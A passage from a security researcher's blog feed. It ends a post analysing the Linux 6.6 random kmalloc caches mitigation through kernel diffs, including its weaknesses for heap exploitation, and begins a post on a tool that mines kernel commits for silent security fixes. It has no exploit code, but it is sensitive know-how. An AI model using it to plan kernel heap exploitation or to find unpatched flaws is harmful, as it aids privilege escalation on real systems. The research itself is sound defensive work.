+#endif</code></pre><p>The <code><a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L363">kmalloc_cache_type</a></code> enum is used to manage the different kmalloc cache types. <code><a href="https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L956">create_kmalloc_caches()</a></code> allocates the initial <code><a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/slub_def.h#L98">struct kmem_cache</a></code> objects, which represent the slab caches we&apos;ve been talking about, which are then stored in the exported <code><a href="https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L677">struct kmem_cache *<br>kmalloc_caches[NR_KMALLOC_TYPES][KMALLOC_SHIFT_HIGH + 1]</a></code> array. As we can see from the definition, the cache type is used as one of the indexes into the array to fetch a cache, the other is the size index for that cache type (see <code><a href="https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L692">size_index[24]</a></code>).</p><p>With that in mind, an entry for each of the cache copies is added to <code><a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L363">enum kmalloc_cache_type</a></code> so that they&apos;re created and fetchable as part of the existing API:</p><figure class="kg-card kg-code-card"><pre><code class="language-C">enum kmalloc_cache_type {
	KMALLOC_NORMAL = 0,
#ifndef CONFIG_ZONE_DMA
	KMALLOC_DMA = KMALLOC_NORMAL,
#endif
#ifndef CONFIG_MEMCG_KMEM
	KMALLOC_CGROUP = KMALLOC_NORMAL,
#endif
+	KMALLOC_RANDOM_START = KMALLOC_NORMAL,
+	KMALLOC_RANDOM_END = KMALLOC_RANDOM_START + RANDOM_KMALLOC_CACHES_NR,
#ifdef CONFIG_SLUB_TINY
	KMALLOC_RECLAIM = KMALLOC_NORMAL,
#else
	KMALLOC_RECLAIM,
#endif
#ifdef CONFIG_ZONE_DMA
	KMALLOC_DMA,
#endif
#ifdef CONFIG_MEMCG_KMEM
	KMALLOC_CGROUP,
#endif
	NR_KMALLOC_TYPES
};
</code></pre><figcaption>diff from <a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h">include/linux/slab.h</a></figcaption></figure><p>The <code><a href="https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L824">kmalloc_info[]</a></code> is another key data structure in the kmalloc cache initialisation. This array essentially contains a <code><a href="https://elixir.bootlin.com/linux/v6.6/source/mm/slab.h#L275">struct kmalloc_info_struct</a></code> for each of the kmalloc &quot;bucket&quot; sizes we talk about. Each element stores the <code>size</code> fo the bucket and the <code>name</code> for the various caches types of that size. E.g. <code>kmalloc-rnd-01-64</code> or <code>kmalloc-cg-64</code>.</p><p>This array is then used to pull the correct cache <code>name</code> to pass to <code><a href="https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L661">create_kmalloc_cache()</a></code> given the size index and cache type.</p><p>I&apos;m speeding through this, but you can probably tell already this is going to involve some macros. <code><a href="https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L809">INIT_KMALLOC_INFO(__size, __short_size)</a></code> is used to initialise each of the elements in <code>kmalloc_info[]</code>, with additional macros to initialise each of the <code>name[]</code> elements according to type. </p><p>Below we can see the addition of the kmalloc random caches:</p><figure class="kg-card kg-code-card"><pre><code class="language-C">+#ifdef CONFIG_RANDOM_KMALLOC_CACHES
+#define __KMALLOC_RANDOM_CONCAT(a, b) a ## b
+#define KMALLOC_RANDOM_NAME(N, sz) __KMALLOC_RANDOM_CONCAT(KMA_RAND_, N)(sz)
+#define KMA_RAND_1(sz)                  .name[KMALLOC_RANDOM_START +  1] = &quot;kmalloc-rnd-01-&quot; #sz,
+#define KMA_RAND_2(sz)  KMA_RAND_1(sz)  .name[KMALLOC_RANDOM_START +  2] = &quot;kmalloc-rnd-02-&quot; #sz,
+#define KMA_RAND_3(sz)  KMA_RAND_2(sz)  .name[KMALLOC_RANDOM_START +  3] = &quot;kmalloc-rnd-03-&quot; #sz,
+#define KMA_RAND_4(sz)  KMA_RAND_3(sz)  .name[KMALLOC_RANDOM_START +  4] = &quot;kmalloc-rnd-04-&quot; #sz,
+#define KMA_RAND_5(sz)  KMA_RAND_4(sz)  .name[KMALLOC_RANDOM_START +  5] = &quot;kmalloc-rnd-05-&quot; #sz,
+#define KMA_RAND_6(sz)  KMA_RAND_5(sz)  .name[KMALLOC_RANDOM_START +  6] = &quot;kmalloc-rnd-06-&quot; #sz,
+#define KMA_RAND_7(sz)  KMA_RAND_6(sz)  .name[KMALLOC_RANDOM_START +  7] = &quot;kmalloc-rnd-07-&quot; #sz,
+#define KMA_RAND_8(sz)  KMA_RAND_7(sz)  .name[KMALLOC_RANDOM_START +  8] = &quot;kmalloc-rnd-08-&quot; #sz,
+#define KMA_RAND_9(sz)  KMA_RAND_8(sz)  .name[KMALLOC_RANDOM_START +  9] = &quot;kmalloc-rnd-09-&quot; #sz,
+#define KMA_RAND_10(sz) KMA_RAND_9(sz)  .name[KMALLOC_RANDOM_START + 10] = &quot;kmalloc-rnd-10-&quot; #sz,
+#define KMA_RAND_11(sz) KMA_RAND_10(sz) .name[KMALLOC_RANDOM_START + 11] = &quot;kmalloc-rnd-11-&quot; #sz,
+#define KMA_RAND_12(sz) KMA_RAND_11(sz) .name[KMALLOC_RANDOM_START + 12] = &quot;kmalloc-rnd-12-&quot; #sz,
+#define KMA_RAND_13(sz) KMA_RAND_12(sz) .name[KMALLOC_RANDOM_START + 13] = &quot;kmalloc-rnd-13-&quot; #sz,
+#define KMA_RAND_14(sz) KMA_RAND_13(sz) .name[KMALLOC_RANDOM_START + 14] = &quot;kmalloc-rnd-14-&quot; #sz,
+#define KMA_RAND_15(sz) KMA_RAND_14(sz) .name[KMALLOC_RANDOM_START + 15] = &quot;kmalloc-rnd-15-&quot; #sz,
+#else // CONFIG_RANDOM_KMALLOC_CACHES
+#define KMALLOC_RANDOM_NAME(N, sz)
+#endif
+
 #define INIT_KMALLOC_INFO(__size, __short_size)			\
 {								\
 	.name[KMALLOC_NORMAL]  = &quot;kmalloc-&quot; #__short_size,	\
 	KMALLOC_RCL_NAME(__short_size)				\
 	KMALLOC_CGROUP_NAME(__short_size)			\
 	KMALLOC_DMA_NAME(__short_size)				\
+	KMALLOC_RANDOM_NAME(RANDOM_KMALLOC_CACHES_NR, __short_size)	\
 	.size = __size,						\
 }

const struct kmalloc_info_struct kmalloc_info[] __initconst = {
	INIT_KMALLOC_INFO(0, 0),
	INIT_KMALLOC_INFO(96, 96),
	INIT_KMALLOC_INFO(192, 192),
	INIT_KMALLOC_INFO(8, 8),
	INIT_KMALLOC_INFO(16, 16),
	INIT_KMALLOC_INFO(32, 32),
	INIT_KMALLOC_INFO(64, 64),
	INIT_KMALLOC_INFO(128, 128),
	INIT_KMALLOC_INFO(256, 256),
	INIT_KMALLOC_INFO(512, 512),
	INIT_KMALLOC_INFO(1024, 1k),
	INIT_KMALLOC_INFO(2048, 2k),
	INIT_KMALLOC_INFO(4096, 4k),
	INIT_KMALLOC_INFO(8192, 8k),
	INIT_KMALLOC_INFO(16384, 16k),
	INIT_KMALLOC_INFO(32768, 32k),
	INIT_KMALLOC_INFO(65536, 64k),
	INIT_KMALLOC_INFO(131072, 128k),
	INIT_KMALLOC_INFO(262144, 256k),
	INIT_KMALLOC_INFO(524288, 512k),
	INIT_KMALLOC_INFO(1048576, 1M),
	INIT_KMALLOC_INFO(2097152, 2M)
};

</code></pre><figcaption>diff from <a href="https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L787">mm/slab_common.c</a></figcaption></figure><h3 id="seed-setup">Seed Setup</h3><p>Moving on, we can see how the per-boot seed is generated, which is one of the values used to randomise which cache a particular <code>kmalloc()</code> call site is going to end up in.</p><p>This is initialised during the initial kmalloc cache creation and is stored in the the exported symbol <code><a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L398">random_kmalloc_seed</a></code>, as we can see below:</p><figure class="kg-card kg-code-card"><pre><code class="language-C">+#ifdef CONFIG_RANDOM_KMALLOC_CACHES
+unsigned long random_kmalloc_seed __ro_after_init;
+EXPORT_SYMBOL(random_kmalloc_seed);
+#endif

...

void __init create_kmalloc_caches(slab_flags_t flags)
{
    ...
+#ifdef CONFIG_RANDOM_KMALLOC_CACHES
+	random_kmalloc_seed = get_random_u64();
+#endif
</code></pre><figcaption>diff from <a href="https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L956">mm/slab_common.c</a></figcaption></figure><p>It&apos;s worth noting here the <code><a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/init.h#L52">__init</a></code> and <code>__ro_after_init</code> annotations. The former is a macro used to tell the kernel this code is only run during initialisation and doesn&apos;t need to hang around in memory after everything&apos;s setup.</p><p><code>__ro_after_init</code> was introduced by Kees Cook back in 2016<sup><a href="https://lwn.net/Articles/676145/">[1]</a></sup> to reduce the writable attack surface in the kernel by moving memory that&apos;s only written to during kernel initialisation to a read-only memory region.</p><h3 id="kmalloc-allocations">Kmalloc Allocations</h3><p>Okay, so we&apos;ve covered how the caches are created and the seed initialisation, how are objects then actually allocated to one of these random kmalloc caches?</p><p>As we touched on, the random cache a particular allocation ends up in comes from two factors: the <code>kmalloc()</code> callsite and the per-boot <code>random_kmalloc_seed</code>:</p><figure class="kg-card kg-code-card"><pre><code>+static __always_inline enum kmalloc_cache_type kmalloc_type(gfp_t flags, unsigned long caller)
 {
 	/*
 	 * The most common case is KMALLOC_NORMAL, so test for it
 	 * with a single branch for all the relevant flags.
 	 */
 	if (likely((flags &amp; KMALLOC_NOT_NORMAL_BITS) == 0))
+#ifdef CONFIG_RANDOM_KMALLOC_CACHES
+		/* RANDOM_KMALLOC_CACHES_NR (=15) copies + the KMALLOC_NORMAL */
+		return KMALLOC_RANDOM_START + hash_64(caller ^ random_kmalloc_seed,
+						      ilog2(RANDOM_KMALLOC_CACHES_NR + 1));
+#else
 		return KMALLOC_NORMAL;
+#endif</code></pre><figcaption>diff from <a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L400">include/linux/slab.h</a></figcaption></figure><p>As we can see above, when calculating the kmalloc cache type for an allocation, if the flags are appropriate for the kmalloc random caches, a hash is generated from the two values mentioned and is used to calculate the kmalloc cache type (from the <code><a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L363">kmalloc_cache_type</a></code> enum, of which there is one for each <code>RANDOM_KMALLOC_CACHES_NR</code>), which is then used fetch the cache from <code>kmalloc_caches[]</code>.</p><figure class="kg-card kg-code-card"><pre><code class="language-c">static __always_inline __alloc_size(1) void *kmalloc(size_t size, gfp_t flags)
{
	if (__builtin_constant_p(size) &amp;&amp; size) {
		unsigned int index;

		if (size &gt; KMALLOC_MAX_CACHE_SIZE)
			return kmalloc_large(size, flags);

 		index = kmalloc_index(size);
 		return kmalloc_trace(
-				kmalloc_caches[kmalloc_type(flags)][index],
+				kmalloc_caches[kmalloc_type(flags, _RET_IP_)][index],
 				flags, size);
 	}
 	return __kmalloc(size, flags);
}</code></pre><figcaption>diff from <a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L590">include/linux/slab.h</a></figcaption></figure><p>We can see <code>kmalloc()</code> now passes the caller, using the <code><a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/instruction_pointer.h#L7">_RET_IP_</a></code> macro, to <code>kmalloc_type()</code>. This means the <code>unsigned long caller</code> used to generate the hash is the return address for the <code>kmalloc()</code> call. </p><h3 id="thoughts">Thoughts</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/10/how_do_we_feel-1.gif" class="kg-image" alt="Exploring Linux&apos;s New Random Kmalloc Caches" loading="lazy" width="480" height="480"></figure><p>To wrap things up on the implementation side of things, lets discuss some of the pros and cons for <code>KMALLOC_RANDOM_CACHES</code>. As the config help text explains, the aim of this hardening feature is to make it &quot;more difficult to spray vulnerable memory objects on the heap for the purpose of exploiting memory vulnerabilities.&quot;<sup><a href="https://elixir.bootlin.com/linux/v6.6/source/mm/Kconfig#L339">[2]</a></sup>.</p><p>It&apos;s safe to say (I think), that within the context of the current heap exploitation meta and exploring the feature&apos;s implementation, <strong>it does shake up the existing techniques</strong> commonly seen for shaping the heap and exploiting heap vulnerabilities. </p><p>On top of that, it&apos;s a reasonably <strong>lightweight</strong> and <strong>performance friendly</strong> implementation, pretty much exclusively touching the slab allocator implementation.</p><p>It is because of that last point, though, that it is <strong>unable to provide any mitigation against the cache reuse and overflow techniques</strong> mentioned earlier, as this relies on manipulating the underlying page allocator which isn&apos;t addressed by this patch. </p><p>As a result, in certain circumstances you could cause the free one of these random kmalloc cache slabs containing your vulnerable object and have it reallocated in a more favourable cache. Similar could be said for the cache overflow attacks.</p><p>An implementation specific point to note is on the use of the kmalloc return address (for <code>kmalloc()</code>, <code>kmalloc_node()</code>, <code>__kmalloc()</code> etc.) to determine which random kmalloc cache is used. If other parts of the kernel make wrappers around the slab API for their own purposes, such as <code><a href="https://elixir.bootlin.com/linux/v6.6/source/fs/f2fs/f2fs.h#L3379">f2fs_kmalloc()</a></code>, <strong>any objects using that wrapper can share the same <code>_RET_IP_</code></strong> from the slab allocators perspective and end up in the same cache.</p><hr><ol><li><a href="https://lwn.net/Articles/676145/">https://lwn.net/Articles/676145/</a></li><li><a href="https://elixir.bootlin.com/linux/v6.6/source/mm/Kconfig#L339">https://elixir.bootlin.com/linux/v6.6/source/mm/Kconfig#L339</a></li></ol><h2 id="whats-the-new-meta">What&apos;s The New Meta?</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/10/are_we_in_trouble.gif" class="kg-image" alt="Exploring Linux&apos;s New Random Kmalloc Caches" loading="lazy" width="480" height="270"></figure><p>Before we put our speculation hats on and start discussing what the new trends and techniques for heap exploitation might look like post <code>RANDOM_KMALLOC_CACHES</code>, it&apos;s worth highlighting that just because it&apos;s <em>in</em> the 6.6 kernel doesn&apos;t mean we&apos;ll see it for a while.</p><p>First of all, the 6.6 kernel is the latest release and it&apos;ll be a while until we see this get sizeable uptake in the real world. Secondly, it&apos;s currently an opt-in feature, disabled by default, so it really depends on the distros and vendors to enable this (and we all know that can take a while for security stuff! <em>cough</em> <code>modprobe_path</code>). </p><p>Additionally, there are a couple other mitigations out there that look to mitigate heap exploitation in different ways. This includes grsecurity&apos;s AUTOSLAB<sup><a href="https://grsecurity.net/how_autoslab_changes_the_memory_unsafety_game">[1]</a></sup> and the experimental mitigations being used on kCTF by Jann Horn and Matteo Rizzo (which I&apos;d love to get into here, perhaps another post?!)<sup><a href="https://github.com/thejh/linux/blob/slub-virtual-v6.1-lts/MITIGATION_README">[2]</a></sup>. These could potentially see more uptake in the long run than <code>RANDOM_KMALLOC_CACHES</code>, or vice versa.</p><p>But <em>if</em> we were interested in tackling heap exploitation in a <code>RANDOM_KMALLOC_CACHES</code> environment, what might it look like? As we mentioned, this implementation focuses on the slab allocator and doesn&apos;t really touch the page allocator. As a result, the kernel is still vulnerable to cache reuse and overflow attacks. </p><p>So perhaps we see a world where &quot;generic techniques&quot; shift to finding new page allocator feng shui primitives, which has had less focus, to streamline the cache reuse/overflow approaches and gain LPE or perhaps to leak the random seed. </p><p>It&apos;s hard to say this early on, and without spending more time on the problem, whether we&apos;d shift into a new norm of generic techniques and approaches for page allocator feng shui as a result of this kind of slab hardening, or whether due to the constraints that&apos;s simply infeasible and the shift will be to more bespoke chains per bug (which could be considered quite a win for hardening&apos;s sake). </p><p>That said, I&apos;m sure the same was said about previous hardening features so who knows!</p><hr><ol><li><a href="https://grsecurity.net/how_autoslab_changes_the_memory_unsafety_game">https://grsecurity.net/how_autoslab_changes_the_memory_unsafety_game</a></li><li><a href="https://github.com/thejh/linux/blob/slub-virtual-v6.1-lts/MITIGATION_README">https://github.com/thejh/linux/blob/slub-virtual-v6.1-lts/MITIGATION_README</a></li></ol><h2 id="wrapping-up">Wrapping Up</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/11/did_we_make_it.gif" class="kg-image" alt="Exploring Linux&apos;s New Random Kmalloc Caches" loading="lazy" width="480" height="270"></figure><p>Wow, we made it to the end! A 4k word deep dive into a new kernel mitigation certainly is one way to get back into the swing of things, hopefully it made a good read though :) </p><p>We talked about the new kernel mitigation <code>RANDOM_KMALLOC_CACHES</code> and gave some context into the problems its trying to address. Loaded with that information we explored the implementation and how that might impact current heap exploitation techniques.</p><p>I would have liked to have spent more time tinkering with the mitigation in anger and perhaps including some demos or experiments, but being realistic about my time and availability, I figured it&apos;d be good to get this out rather than <em>maybe</em> get that out.</p><p>That said, maybe I&apos;ll try write up some old heap ndays on a <code>RANDOM_KMALLOC_CACHES=y</code> system to try and demonstrate the different approaches required. That sounds quite fun!</p><p>Equally, I quite liked doing a breakdown and review of a new kernel feature, so perhaps I&apos;ll do some more of that going forward (maybe the kCTF experimental mitigations???). </p><p>Anyways, you&apos;ve endured enough of my waffling, thanks for reading! As always feel free to <a href="https://twitter.com/sam4k1">@me</a> if you have any questions, suggestions or corrections :)</p><p>exit(0);</p>]]></content:encoded></item><item><title><![CDATA[Analysing Linux Kernel Commits]]></title><description><![CDATA[Tag along as I talk about a half finished project, looking at analysing Linux kernel commits for interesting security fixes.]]></description><link>https://sam4k.com/analysing-linux-kernel-commits/</link><guid isPermaLink="false">63de782692020209c38fca22</guid><category><![CDATA[linux]]></category><category><![CDATA[research]]></category><dc:creator><![CDATA[sam4k]]></dc:creator><pubDate>Tue, 07 Feb 2023 20:01:23 GMT</pubDate><media:content url="https://sam4k.com/content/images/2023/02/detective_pik.gif" medium="image"/><content:encoded><![CDATA[<img src="https://sam4k.com/content/images/2023/02/detective_pik.gif" alt="Analysing Linux Kernel Commits"><p>It&apos;s been a while, hasn&apos;t it? This post is going to be a bit of a change of pace from usual, as its actually covering some research from last year I ended up dropping. </p><p>The plan was to do some analysis of Linux kernel commits, to determine the feasibility of automating the process of finding interesting and potentially exploitable vulnerabilities, hopefully putting a novel poc or two together. </p><p>However, between both IRL circumstances and simply underestimating the time involved, this has dragged on more than I&apos;d like for a blog post to take and I&apos;m eager to move onto new things. But instead of putting it on the back burner, AKA never to see the light of day again, I thought I&apos;d share the tool I ended up writing and discuss some background behind it as well as my own takeaways during my time working on this stuff. </p><p>So in this post I&apos;ll talk a little about the background behind the motivations for looking into this and why kernel security fixes is an interesting topic. Then I&apos;ll do a quick tl;dr on the tool, Lica (<strong>Li</strong>nux <strong>C</strong>ommit <strong>A</strong>nalyser), I wrote and share some takeaways.</p><h3 id="disclaimer">Disclaimer</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/01/hold_up.gif" class="kg-image" alt="Analysing Linux Kernel Commits" loading="lazy" width="480" height="270"></figure><p>Before we dive into things, some of the topics and issues I cover in this post are both complex and contentious. I want to highlight that I am by no means an expert on these things, and my thoughts here are from the experiences (and biases) of a security researcher.</p><p>Where there are gaps in my understanding or knowledge, I&apos;ll try to the highlight them, and if anyone has any corrections or additional info please let me know, thank you!</p><h2 id="content">Content</h2><!--kg-card-begin: markdown--><ul>
<li><a href="#background">Background</a>
<ul>
<li><a href="#kernel-dev-tldr">kernel dev tl;dr</a></li>
<li><a href="#on-silent-security-fixes">on (silent) security fixes</a></li>
<li><a href="#the-plan">the plan</a></li>
</ul>
</li>
<li><a href="#lica">Lica</a></li>
<li><a href="#takeaways">Takeaways</a>
<ul>
<li><a href="#on-disclosures">On Disclosures</a></li>
</ul>
</li>
<li><a href="#conclusion">Conclusion</a></li>
</ul>
<!--kg-card-end: markdown--><h2 id="background">Background</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/02/lets_get_into_it.gif" class="kg-image" alt="Analysing Linux Kernel Commits" loading="lazy" width="480" height="270"></figure><p>The original motivation behind this research stems from a somewhat contentious and longstanding topic of discussion amongst the Linux kernel community regarding the handling of security fixes, such as instances of &quot;silent security fixes&quot;.</p><p>First of all, to give some context to what we&apos;re talking about, let&apos;s do a quick tl;dr on kernel development and some of the terms mentioned so we&apos;re all up to speed! (feel free to skip)</p><h3 id="kernel-dev-tldr">kernel dev tl;dr</h3><p>&quot;The Linux kernel is a free and open-source, monolithic, modular, multitasking, Unix-like operating system kernel [...] Day-to-day development discussions take place on the <a href="https://en.wikipedia.org/wiki/Linux_kernel_mailing_list">Linux kernel mailing list</a> (LKML). Changes are tracked using the version control system <a href="https://en.wikipedia.org/wiki/Git">git</a>&quot; <sup><a href="https://en.wikipedia.org/wiki/Linux_kernel">[1]</a></sup></p><p>Specifically for a project using git, we can track the changes made by looking at the commits. A commit describes a set of changes made to the project by an author. If we look at projects on GitHub for example, we can see this. As of writing, the <a href="https://github.com/torvalds/linux">Linux kernel source tree</a> mirror on GitHub has 1,154,596 commits that <a href="https://github.com/torvalds/linux/commits/master">we can peruse</a>! </p><p>That&apos;s a lot of changes, right? The Linux kernel has guidelines and rules about submitting patches<sup><a href="https://www.kernel.org/doc/html/latest/process/submitting-patches.html">[2]</a></sup>, but typically a commit is a logically cohesive set of changes (i.e. you won&apos;t see a bunch of different fixes for different parts of the kernel in one commit, I hope anyway).</p><p>All these changes are organised into releases, which you can read about over at <a href="https://www.kernel.org/category/releases.html">kernel.org</a><sup>[3]</sup>, with new mainline kernels being releases every 9-10 weeks. </p><p>Important to note is the concept of <strong>backporting</strong>, whereby bug fixes introduced in latest releases are applied to older kernel releases as well. There are several long-term maintenance (aka LTS) kernel releases, to designate support for older kernels.</p><h3 id="on-silent-security-fixes">on (silent) security fixes</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/01/shh.gif" class="kg-image" alt="Analysing Linux Kernel Commits" loading="lazy" width="480" height="270"></figure><p>There&apos;s been lots of discussion surrounding security fixes and how they should be handled in relation to non-security fixes in the kernel, and this dialogue has understandably evolved over the years as our concept and understanding of security has too.</p><p>It&apos;s a complex topic and to over simplify the arguments, on either extreme of the axis you may have folks saying all fixes should be treated equally, while others would argue security fixes need to be dealt with in a specific way, highlighting the impact etc.</p><p>A recurring topic in this space is the concept of &quot;silent security fixes&quot;, where a commit fixing a potentially exploitable vulnerability <em>intentionally</em> omits information regarding the security implications/reasons behind the fix.</p><p>This has been up for debate within the community as far back, at least, as 2008 as we can seem from this post on the <a href="https://seclists.org/fulldisclosure/">Full Disclosure</a> mailing list from 2008, titled &quot;<a href="https://seclists.org/fulldisclosure/2008/Jul/276">Linux&apos;s unofficial security-through-coverup policy</a>&quot; by <a href="https://twitter.com/spendergrsec">@spendergrsec</a>.</p><p>Now as I mentioned earlier, a lot has changed since then, and our perception of security has come a long way since then. However over the years there have still been cases of, at worst, silent security fixes or, at best, inconsistency in the handling of security fixes<sup>[5][6][7][8]</sup>.</p><h3 id="the-plan">the plan</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/02/piqued_interest.gif" class="kg-image" alt="Analysing Linux Kernel Commits" loading="lazy" width="400" height="225"></figure><p>Putting this altogether, I was interested in analysing Linux kernel commits in a somewhat automated way such that I could filter for security fixes and explore trends. </p><p>With full understanding that I&apos;m no data scientist or software engineer, I whipped up a quick (and very hacky) tool to delve around a bit and have some fun. </p><hr><ol><li><a href="https://en.wikipedia.org/wiki/Linux_kernel">https://en.wikipedia.org/wiki/Linux_kernel</a></li><li><a href="https://www.kernel.org/doc/html/latest/process/submitting-patches.html">https://www.kernel.org/doc/html/latest/process/submitting-patches.html</a></li><li><a href="https://www.kernel.org/category/releases.html">https://www.kernel.org/category/releases.html</a></li><li><a href="https://github.com/hardenedlinux/grsecurity-101-tutorials/blob/master/kernel_vuln_exp.md#silent-fixes-from-linux-kernel-community--welcome-to-add-more-for-fun">https://github.com/hardenedlinux/grsecurity-101-tutorials/blob/master/kernel_vuln_exp.md#silent-fixes-from-linux-kernel-community--welcome-to-add-more-for-fun</a></li><li><a href="https://arstechnica.com/information-technology/2013/05/critical-linux-vulnerability-imperils-users-even-after-silent-fix/">https://arstechnica.com/information-technology/2013/05/critical-linux-vulnerability-imperils-users-even-after-silent-fix/</a></li><li><a href="https://seclists.org/oss-sec/2022/q2/134">CVE-2022-1786</a> was UAF leading to LPE, with no mention in the <a href="https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?h=linux-5.10.y&amp;id=29f077d070519a88a793fbc70f1e6484dc6d9e35">fix commit</a></li><li><a href="https://seclists.org/oss-sec/2022/q4/30">CVE-2022-2602</a> was a UAF leading to LPE, with no mention in the <a href="https://github.com/torvalds/linux/commit/0091bfc81741b8d3aeb3b7ab8636f911b2de6e80">fix commit</a></li><li><a href="https://seclists.org/oss-sec/2021/q3/181">CVE-2021-41073</a> was disclosed by <a href="https://twitter.com/chompie1337">@chompie1337</a>, although the <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=16c8d2df7ec0eed31b7d3b61cb13206a7fb930cc">fix commit</a> has no mention of the exploitability and they also asked her to use a non-security related email for the &quot;Reported-by&quot; ack (as mentioned in <a href="https://twitter.com/chompie1337">@chompie1337</a>&apos;s article <a href="https://s3.eu-west-1.amazonaws.com/www.thinkst.com/thinkstscapes/ThinkstScapes-2022-Q1-highres.pdf">here</a>)</li></ol><h2 id="lica">Lica</h2><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://sam4k.com/content/images/2023/01/digusted_screen.gif" class="kg-image" alt="Analysing Linux Kernel Commits" loading="lazy" width="465" height="286"><figcaption>get ready for some peak xdev-ctf-poc-tier code</figcaption></figure><p>Let&apos;s talk about the tool! I&apos;ll try keep this brief, both for my dignity and your sanity. I put together this tool using Python to parse kernel commits and try filter them for interesting security related fixes as well as any interesting stats along the way.</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://github.com/sam4k/lica"><div class="kg-bookmark-content"><div class="kg-bookmark-title">sam4k/lica</div><div class="kg-bookmark-description">A hacky tool for analysing linux kernel commits. Contribute to sam4k/lica development by creating an account on GitHub.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://github.com/fluidicon.png" alt="Analysing Linux Kernel Commits"><span class="kg-bookmark-author">GitHub</span><span class="kg-bookmark-publisher">sam4k</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://opengraph.githubassets.com/561442210ba6aa617044c346119ca7888f22fb4128acf00e6a3e55ad42927838/sam4k/lica" alt="Analysing Linux Kernel Commits"></div></a></figure><p>Thanks to the kernel patch submission guidelines<sup><a href="https://www.kernel.org/doc/html/latest/process/submitting-patches.html">[1]</a></sup>, there&apos;s some level of consistency in what to expect a commit to contain, which helps us filter down the 34000 or so commits in the last 6 months to around 135 possible security fixes - neat! </p><figure class="kg-card kg-code-card"><pre><code>Commit...... | Subsystem......... | Hits.................................... | CVE............. | Reporter.......................................... | Coverage.......
----------------------------------------------------------------------------------------------------------------------------------------------------------------------
...
331cd9461412 | btrfs              | use-after-free                           |                  | Ye Bin &lt;yebin10@huawei.com&gt;                        | linux-5.15.90, linux-5.10.165, linux-5.4.230
...
cf6531d98190 | ksmbd              | use-after-free                           |                  | zdi-disclosures@trendmicro.com # ZDI-CAN-17816     | N/A            
...          
----------------------------------------------------------------------------------------------------------------------------------------------------------------------
Now For The Stats...
----------------------------------------------------------------------------------------------------------------------------------------------------------------------
[+] 133 commits where matched from 2448 fixes, over 33487 commits.
[+] 36 / 133 listed a reporter.
[+] 2 / 133 mentioned a CVE.
[+] Breakdown by category:
|---- UAF: 95
|---- Races: 22
|---- Generic: 15
|---- Info Leak: 10
|---- Stack Overflow: 2
...
[+] Breakdown by module:
|---- mm: 11
|---- wifi: 10
|---- drm: 8
|---- media: 6
|---- net: 5
|---- cifs: 4
|---- io_uring: 4
...</code></pre><figcaption>output for the last 6 months or so, checking for coverage in latest 5.15, 5.10, 5.4 at the time</figcaption></figure><p>Above is a sample output from Lica, analysing kernel commits over the past 180 days. Here I&apos;ve used a really basic approach of looking for fixes via keyword in the commit summary phrase and then further filtering those fixes by looking for hits in a dictionary of common bug classes/terminology, grouped by category.</p><p>A (slightly) more nuanced approach, looking at some of the &quot;silent fixes&quot; from earlier, would be to grep for typical <em>causes</em> for bug classes + the omission of bug classes. A simple example might be <code>check.*len</code> for missing length checks.</p><p>It&apos;s worth noting that while we can use a basic dictionary or even filter by specific reporters (I&apos;m looking at you ZDI), using a bug cause focused dictionary (that omits security-centric terms) yields just as many results. </p><p>While more false positives, I think this reiterates that a determined attacker doesn&apos;t need to just grep for &quot;buffer overflow privesc&quot; or a CVE to find potentially exploitable vulnerabilities. Whether that&apos;s manually enumerating commits or using an approach like this which takes a few hours to put together, which makes me wonder why we have cases such as a researcher being ask to use a non security related email for the &quot;Reported-by&quot; ack<sup>[2]</sup>??</p><p>Back to Lica, I also include a naive check to see if a particular kernel release has the patch, for checking older LTS kernels for backports (the <code>Coverage</code> column). There&apos;s no doubt an easier and more reliable way to do this, but hey-ho, this did the trick for now.</p><p>Anyways, I tried to make this somewhat extensible and configurable, so I&apos;ve chucked it up on GitHub in case anyone is interested in having a play with it. You&apos;ve been warned about the quality!</p><hr><ol><li><a href="https://www.kernel.org/doc/html/latest/process/submitting-patches.html">https://www.kernel.org/doc/html/latest/process/submitting-patches.html</a></li><li><a href="https://seclists.org/oss-sec/2021/q3/181">CVE-2021-41073</a> was disclosed by <a href="https://twitter.com/chompie1337">@chompie1337</a>, although the <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=16c8d2df7ec0eed31b7d3b61cb13206a7fb930cc">fix commit</a> has no mention of the exploitability and they also asked her to use a non-security related email for the &quot;Reported-by&quot; ack (as mentioned in <a href="https://twitter.com/chompie1337">@chompie1337</a>&apos;s article <a href="https://s3.eu-west-1.amazonaws.com/www.thinkst.com/thinkstscapes/ThinkstScapes-2022-Q1-highres.pdf">here</a>)</li></ol><h2 